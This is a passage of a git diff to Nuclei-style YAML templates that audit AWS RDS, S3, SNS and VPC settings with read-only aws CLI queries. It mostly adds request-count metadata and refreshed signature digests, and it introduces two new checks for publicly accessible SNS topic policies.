4b0a00483046022100d05dd8cfd16004c66141210fee94b5b5b1bdca54b4320091e86f7b7d018c336e022100fcf57d954bb32ef2d5eaf09ca000c729ef9d372ef651d5066f8d1a1e6aee8746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e28cc0c54504b565396262e298134db5eda4e445c0dace7e8fea7908536db5a02207fe42a32f0d5dad744c51a08700afaad542699ee0d0e6edcef743ccf825ec3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml index 40c1bf2e1a..2052d2b027 100644 --- a/cloud/aws/rds/rds-ri-payment-fail.yaml +++ b/cloud/aws/rds/rds-ri-payment-fail.yaml @@ -11,8 +11,9 @@ info: Review the payment methods on file and retry the reservation purchase for RDS instances to secure discounted rates. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithReservedDBInstances.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"RDS Reserved Instance purchase has failed for " + db' -# digest: 4a0a00473045022040705df585fbeec117d8605a7eb385b6fb0ae5cca87f948b79aef51f4a4b5b19022100a62f52ca4c10ab087a8d672d8288e120540531595b354c0663a7b5c7426ee198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a87e8dbc52f8aa2867a09fe762c4eace58048fadd793ae073b556f4814e4e50022013d99683b2f38021dd6593524fc114936c990879b36fe374fde999d9a7764d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml index 49f17f0de3..c26493e0bb 100644 --- a/cloud/aws/rds/rds-snapshot-encryption.yaml +++ b/cloud/aws/rds/rds-snapshot-encryption.yaml @@ -11,8 +11,9 @@ info: Enable encryption for RDS snapshots by using AWS KMS Customer Master Keys (CMKs) for enhanced data security and compliance. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_EncryptSnapshot.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"Amazon RDS database snapshot " + snapshot + " is not encrypted"' -# digest: 490a0046304402207212f314b007f635435474f0ab2253e018047b2f878450e253223d5daa74da3f022064293bf9b3a736189797d2b46e1ad224dd05fa73dfe1ff2d0531a229ab2c89c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205835b9ea589fc13c9871eb2bb67185366bd4e82f24d8f172fd9f92ba53042e890220604cdbd900e33f44ad4e7dbf7b801719455093a3b1a326b0a06dd364ac6e9528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml index 4d86b97f8f..b9f3e4b501 100644 --- a/cloud/aws/s3/s3-access-logging.yaml +++ b/cloud/aws/s3/s3-access-logging.yaml @@ -7,6 +7,8 @@ info: This template verifies if the Server Access Logging feature is enabled for Amazon S3 buckets, which is essential for tracking access requests for security and audit purposes. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" does not have access logging enabled."' -# digest: 4b0a004830460221009c7c7b0d5efd419b91df9f3a9c18cbb5c3cf3e05586c1a2feaf8e1c1c1b5d5b5022100ac7392ba990a22432ad62945a93d61578dd95013697d6c3aefd30fa5e9decaac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fd29baed40f4c511911881ff79e5672f4533dfa6b19e717d05a961de2df470d502202eb21cdb29ae73b3bfbeabf3cb447bdfc777887e9e6a85b5cfe7edb82bba6e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml index c9a52a4e69..4deaf6e445 100644 --- a/cloud/aws/s3/s3-auth-fullcontrol.yaml +++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets grant FULL_CONTROL access to authenticated users, preventing unauthorized operations reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"FULL_CONTROL is enabled for Authenticated Users on S3 Bucket " + bucket' -# digest: 4b0a00483046022100ae50a09843b165ba2fcd9f5fb5774c60c2ba2ca3ec8461b893c6eb47cce50cf8022100ab31d7ca772ca4fdce476fb02441aaae4130fe68605b346dd30bcaa9f2fb0c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022030e1999b1896b95b962ca877986fb0cf30c6804d6833dd62593a6f4e679759cc022100e43b6694c7aa13dff4686ad1d99e980cef361871b9267b06da36f2878c923a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml index aa49b7d2d1..7431f79674 100644 --- a/cloud/aws/s3/s3-bucket-key.yaml +++ b/cloud/aws/s3/s3-bucket-key.yaml @@ -7,6 +7,8 @@ info: This template verifies if Amazon S3 buckets have bucket keys enabled to optimize the cost of AWS Key Management Service (SSE-KMS) for server-side encryption reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"Key is not enabled for S3 Bucket " + bucket' -# digest: 490a0046304402207628f02f223a9c45013004373f631bfe358fe0898a91b4558b461cdbcb0cb33f02204c02ff4be552778912c6b81a4d7f06b0436bf0facd4066dd1b7b6a60c7fe8727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c522f260419eb69ca4b6a84f00cb91ab124c3bffc1e43e212b56ac15819dbce022100abbef96323f036a8483f553224f7a98cf8c6d5c863ac4faab4ef6b6e7831ab50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml index 2d1b41dd32..a594a87e58 100644 --- a/cloud/aws/s3/s3-bucket-policy-public-access.yaml +++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml @@ -7,6 +7,8 @@ info: This template checks if Amazon S3 buckets are configured to prevent public access via bucket policies reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -54,4 +56,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is publicly accessible via Policy"' -# digest: 4b0a004830460221009b48d546c9c75d61879e6371e646807f994d64408c3f84d48c9a9b344b9743410221009ed66db2acf2d13fb22b03344e70b7679191e4d76de5615fb69753c02d49306d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204fae5eb6e1f955f5a9d53c8f30d1d5fb8742e57e0c2ee96f342abbaa4e2c86fd022100dce6a398ef04206209cf3fc4714c9a933458aca9558d8387e8b42a0aabcc0c57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml index 13ccba19cd..11a5a7fd29 100644 --- a/cloud/aws/s3/s3-mfa-delete-check.yaml +++ b/cloud/aws/s3/s3-mfa-delete-check.yaml @@ -7,6 +7,8 @@ info: This template verifies that Amazon S3 buckets are configured with Multi-Factor Authentication (MFA) Delete feature, ensuring enhanced protection against unauthorized deletion of versioned objects reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-versioning.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is not configured to use MFA Delete feature"' -# digest: 4a0a0047304502207b18bcd326a382b691f9645ba66223e79733146fbaaa7632197a652cb7319085022100d690b22a500eb8036ca670d596ead85d56ce5e576f1147e5e73430a5d49c3765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206258e96a2294f4871ad68d7abdd1564bcb2de1c6696b48b399eb483f48b80f6102210083bc2afe82afaa0825a8360e89b22f988e7e989ac57c9f4a1d9f8169a5e6f0bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml index a365761525..f00ce621b2 100644 --- a/cloud/aws/s3/s3-public-read-acp.yaml +++ b/cloud/aws/s3/s3-public-read-acp.yaml @@ -8,6 +8,8 @@ info: Verifies that Amazon S3 buckets do not permit public 'READ_ACP' (LIST) access to anonymous users, protecting against unauthorized data exposure reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -47,4 +49,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public READ_ACP access"' -# digest: 4b0a00483046022100ed3c7c8177b632e1968b920b9eef94ffdc0784d3b4cfef7073e31fa45879d929022100a4515cf3df6e19fdcc7f9c9460074d6310983bbdd4687e83cce86c290cb62c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcbc17aee844273a0b66faf3957469462eec3e5869547d8652d739501fa028d2022070cd3aa2cf6fcd572dbe1e0e9b989cc1e3a3d25bbe5d7c3f1f45182d0a9047bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml index 56877aa63a..7eee586aa7 100644 --- a/cloud/aws/s3/s3-public-read.yaml +++ b/cloud/aws/s3/s3-public-read.yaml @@ -8,6 +8,8 @@ info: Verifies that Amazon S3 buckets do not permit public 'READ' (LIST) access to anonymous users, protecting against unauthorized data exposure reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -47,4 +49,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public READ access"' -# digest: 4a0a0047304502210096282cee509cda8603576b6bf36e9726a85cd0e5c7ffbf1a1b521840e04b9a0f022003295ca19e84cf783276bd6c7a2fa978a92543199f6da355ddfb130e465442da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0a9951cf1834f311dda7e8506d77563ca19b261254b07db518196933a224149022073682f61c196ae7d6f8f09f162fa702d05ee6f9e70b813d796517a318b6a3724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml index aff44da984..c73cb5ecdc 100644 --- a/cloud/aws/s3/s3-public-write-acp.yaml +++ b/cloud/aws/s3/s3-public-write-acp.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public WRITE_ACP access"' -# digest: 490a004630440220164c9d55d2b50ac44caa26edd47e799e3ec62871676e74736d108a8541f0c2440220136ef5897894c74ad7fb3f936e269b6a777cc4e8f520c42142558990bea8eba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204de77d0507f74d782786aef08b62ecbcf9c82eea8522955eb98af9573cccdeb102206b485a9f8b358d4a10de5c2aa8f2c8a0592eb8a32a757b2cd49de953f7c58de5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml index d2192c8cc1..d5b35c8fb7 100644 --- a/cloud/aws/s3/s3-public-write.yaml +++ b/cloud/aws/s3/s3-public-write.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public WRITE access"' -# digest: 490a004630440220795c3882ab9cb8a093b5e2e83c7822aaf15bfe4cff0426f3a6e5743196aa67730220375072f3c8dff6626dd361a31d12615188c7e8bd445e92f41fe755c323cefc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100845642c440c897503168e56980b76b3c167ec82fe1804b8302f0b8de3e0b2578022100f876c6d5ef3bb7c84e665b0c31fc7614bf7c9ec46b630fa6cb90f72e7f7f2d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml index 448ee59987..aaa9afa8e3 100644 --- a/cloud/aws/s3/s3-server-side-encryption.yaml +++ b/cloud/aws/s3/s3-server-side-encryption.yaml @@ -7,6 +7,8 @@ info: This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS). reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is not encrypted at rest"' -# digest: 490a0046304402203e012cd857cace30b445932f893b9bd0f7bc709eec9f6cb5689fd30a520525e0022029cde524c58042593e654d36bfd7dcfb81b9508c534ec7750afe9ff96ad921d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2f7ec06942729d8e4cd463ded9ad780f70660535ae12edcd5371d8c4726b213022100acc1da483bedd46efe1004ba122b638b7e429dcc291052bb7b784f139af5815d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml index 30531fed21..fea988f68b 100644 --- a/cloud/aws/s3/s3-versioning.yaml +++ b/cloud/aws/s3/s3-versioning.yaml @@ -7,6 +7,8 @@ info: Verifies that Amazon S3 buckets have object versioning enabled, providing a safeguard for recovering overwritten or deleted objects reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | @@ -47,4 +49,4 @@ code: - type: dsl dsl: - '"Versioning is not enabled for S3 Bucket " + bucket' -# digest: 4b0a00483046022100ceb8b6be9871b6b9b57c5aa9add8902c3177845310afee02c6f8acc0cec48331022100fc98d53a049eaf0f8450f979233fffec17fd5c23d4c90fb78e68d8f05869f7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220188c6eff76e5890e9487a7990ebc939706257a8d168f4e746b7a10b168f69882022100871f34e7125204a00ffb042ccaf984570af3f3a6a2c582613b4e8333a4f3ba87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/sns/sns-public-subscribe-access.yaml b/cloud/aws/sns/sns-public-subscribe-access.yaml new file mode 100644 index 0000000000..ae4e00c229 --- /dev/null +++ b/cloud/aws/sns/sns-public-subscribe-access.yaml @@ -0,0 +1,68 @@ +id: sns-public-subscribe-access + +info: + name: Public Subscription Access of SNS Topics via Policy + author: Ritesh_Gohil(#L4stPL4Y3R) + severity: high + description: | + This template checks if Amazon SNS topics are configured to allow public subscription access via topic policies. + reference: + - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html + tags: cloud,devops,aws,amazon,sns,aws-cloud-config + +flow: | + code(1) + for (let topicArn of iterate(template.topics)) { + set("topicArn", topicArn) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws sns list-topics --query 'Topics[*].TopicArn' + + extractors: + - type: json + internal: true + name: topics + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws sns get-topic-attributes --topic-arn $topicArn --query Attributes.Policy --output text + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Effect":"Allow"' + + - type: word + part: body + words: + - '"Principal":{"AWS":"*"}' + + - type: word + part: body + words: + - '"Action":"SNS:Subscribe"' + + - type: regex + part: body + negative: true + regex: + - '"Condition"' + + extractors: + - type: dsl + dsl: + - '"The SNS topic " + topicArn + " allows public subscription via Policy"' +# digest: 4a0a004730450221008a967d8e5c9942beefab71caa02bdc0fd01121f2c88254d8a37296a941f8e02c02200d45a3425f5011f61061b5004635f3ad9407bcd88ae47fcda6afc63e883b432d:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/aws/sns/sns-topic-public-accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml new file mode 100644 index 0000000000..9ceffabf70 --- /dev/null +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -0,0 +1,66 @@ +id: sns-topic-public-accessible + +info: + name: Public Access of SNS Topics via Policy + author: Ritesh_Gohil(#L4stPL4Y3R) + severity: high + description: | + This template checks if Amazon SNS topics are configured to prevent public access via topic policies. + reference: + - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html + metadata: + max-request: 2 + tags: cloud,devops,aws,amazon,sns,aws-cloud-config + +flow: | + code(1) + for (let topicArn of iterate(template.topics)) { + set("topicArn", topicArn) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws sns list-topics --query 'Topics[*].TopicArn' + + extractors: + - type: json + internal: true + name: topics + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws sns get-topic-attributes --topic-arn $topicArn --query Attributes.Policy --output text + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Effect":"Allow"' + + - type: word + part: body + words: + - '"Principal":{"AWS":"*"}' + + - type: regex + part: body + negative: true + regex: + - '"Condition"' + + extractors: + - type: dsl + dsl: + - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' + +# digest: 4b0a00483046022100cbb02679b206daa0a1138c3c7d400ca3ccf3aea22840064633a6ac54fbe6a44d022100f23545b9fc5cdb35c1c853d68c2cb35904bd22385117daa75cf0923441d212d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index 1e8bf93789..381e02e4c4 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -11,8 +11,9 @@ info: Restrict Network ACL inbound rules to only allow necessary IP ranges and ports as per the Principle of Least Privilege. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -60,4 +61,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a0047304502200de3239f933f1b468292a1ac4504bc398cad18ac3aa6f2de12357bd0e8a65759022100ee901336ec076eb9058f105f779e66be7bac556e1751713419df333cca4eaddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090f1a4c3cf579052839a7c17926792dc80956b0a3ef6716f594d5dd3539e0e3f02205c9073431d5ad40af0eeb8a4ee457808e7ecac97f253ab129e5f27b78e4e9377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index b7483da1ef..660b35d5e6 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -11,8 +11,9 @@ info: Modify NACL outbound rules to limit traffic to only the ports required for legitimate business needs. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -60,4 +61,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a00473045022021e25dd23124572a8f6dbe6381024f3ecb8f78907d7ba0aafa2eb9c63990e140022100ba7669b283e58bf5b0fd08f3d5501d54221fc7a48b73b088c95330ea4c633f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024d4f02c513a648afb7661835f3744b1696e4866ac46f3be73f69d11264f6c69022100ce93ba9b7fb4b0e9f750ed04fbd68eb6df23e4979ecc05906bd8be9a19bd320e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index 308cb0ab0d..3af37ff600 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -11,8 +11,9 @@ info: Replace NAT instances with Amazon Managed NAT Gateway to ensure high availability and scalability in your VPC network. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-nat-gateway.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - 'vpc + " VPC is not using Managed NAT Gateways"' -# digest: 4b0a00483046022100f5f55c1da4e2aaca4b9547bf032c91c95a45a559e294e66e3a04343878e6416c022100919f04f7539cccd971883f2ac51a5a40f17c588dc2bb561902f5397715facf2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f15845608859adbcb7bc461874985337e016b6bcb1d26f443fd2a91ff851c9340220694f547d8ddea40af0456426f61944e9ca77f5cffbe76e991099683455728858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index 11da6b63b4..58ac71ccd7 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -11,8 +11,9 @@ info: Restrict access to ports 22 and 3389 to trusted IPs or IP ranges to adhere to the Principle of Least Privilege (POLP). reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -62,4 +63,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a0047304502204e05c381a073d28047bdf9026597e5d331abca5011bbd8887ac323dd2b2983fb02210097ddd0dd706718f37b2c2f54820e543a9c6549883adc31296235e4b04fe04e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028901135e75f8db19081e604cf1a970f707aba8ba33166b67eba938ebd823cf3022100d783804e924a32e191e35df29155fb31db60251900a5b60efe4aefceb91db299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index 6fe8d3c737..1daa0c01f7 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -11,8 +11,9 @@ info: Update the VPC endpoint's policy to restrict access only to authorized entities and ensure all requests are signed. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints-access.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -60,4 +61,4 @@ code: - type: dsl dsl: - '"VPC endpoints for " + vpc + "are exposed."' -# digest: 4a0a004730450221009cd9ca7d1c7ce5d6db43cc95291be7e509c29f9ed1c7559ee1aeb31a6579920902206e30e36ec371d03d1c5d805d349458ee43fd27bd65917e4f33050e359de8ea3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200506111e97b28461eceb3c5334265051c3383b8a0eb553d5177f1c6344d933fb0220455e9ba374c56d762b53f3261e06eb79fca8809640330ecac13021f99a98aaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index c2dcfb6728..5d0bf5282c 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -11,8 +11,9 @@ info: Implement VPC endpoints for supported AWS services to secure and optimize connectivity within your VPC, minimizing external access risks. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"VPC Endpoints Not Deployed in the VPC network " + vpc' -# digest: 4a0a004730450220305c7cb9ef27a7249c71a3e30664db9f051b0f5438fe8ce42f2024ea91bfa24e022100e5b9e9b019adf2b1fcfd5121540efdbaf0c5fd39072523eacf41b5a50319666e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009cd67a7be189a4090753f24473354d6e9ea5260fefa513d791e762adabe13082022100d3ef3e2c090c022def55697e03a329df0cfb9ef0bba2b3a7e01e1438af444617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index ca6474d99e..d32039e5c5 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -11,8 +11,9 @@ info: Enable VPC Flow Logs in the AWS Management Console under the VPC dashboard to collect data on IP traffic going to and from network interfaces in your VPC. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" @@ -55,4 +56,4 @@ code: - type: dsl dsl: - '"Flow Logs feature is not enabled for the VPC " + vpc' -# digest: 4a0a00473045022016d83c316f318298be2c514542422c1a2f3a42517ac740d4b85ca980c9bf4676022100e7af7b416817f374b418962094ee777893f8fed6b17880fea736d1eb6caa38b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d7a7d1871ae4512c2ddb09b3645f3c6198d9b1a2e3a23f9f6c4b64dd72f50270220375ec12b44621a7a765b301bf627747d6610602e3275091e81cabf53f0a65684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 1e7ddb8308..5e9567f98b 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -11,8 +11,9 @@ info: Monitor VPN tunnel status via the AWS Management Console or CLI. If a tunnel is DOWN, troubleshoot according to AWS documentation and ensure redundancy by configuring multiple tunnels. reference: - https://docs.aws.amazon.com/vpn/latest/s2svpn/VPNConnections.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpn,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - 'vpnid + " VPN tunnel is down"' -# digest: 490a0046304402205ecec5a00e3d0521ad5a2e9ac0cebbe83e91d206c2233f683dcd750ff5b3841c02205528afb57d459d2c5075638280afcf53459f71aaeb2a5cabc21c41659d91f510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbcc51ec0d056e6f9a356238c660009c4b4fc8f3664e147b8c98c8a417631463022056928c4b49b652c38428461808244e27882fa7e30c7580d1d67511571d4b9c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index 202edfdb07..edc8becfef 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,azure + tags: cloud,enum,cloud-enum,azure,dns self-contained: true @@ -29,5 +29,4 @@ dns: part: answer words: - "IN\tA" - -# digest: 4a0a0047304502206a999e317308128dc9a9f3114f003b2c29cad9f569d6922502a8ac90971cf927022100c4fe9eea1496997e9ef66f8a46c2ece4bd511dede88aaf58d36410be3f2cc758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 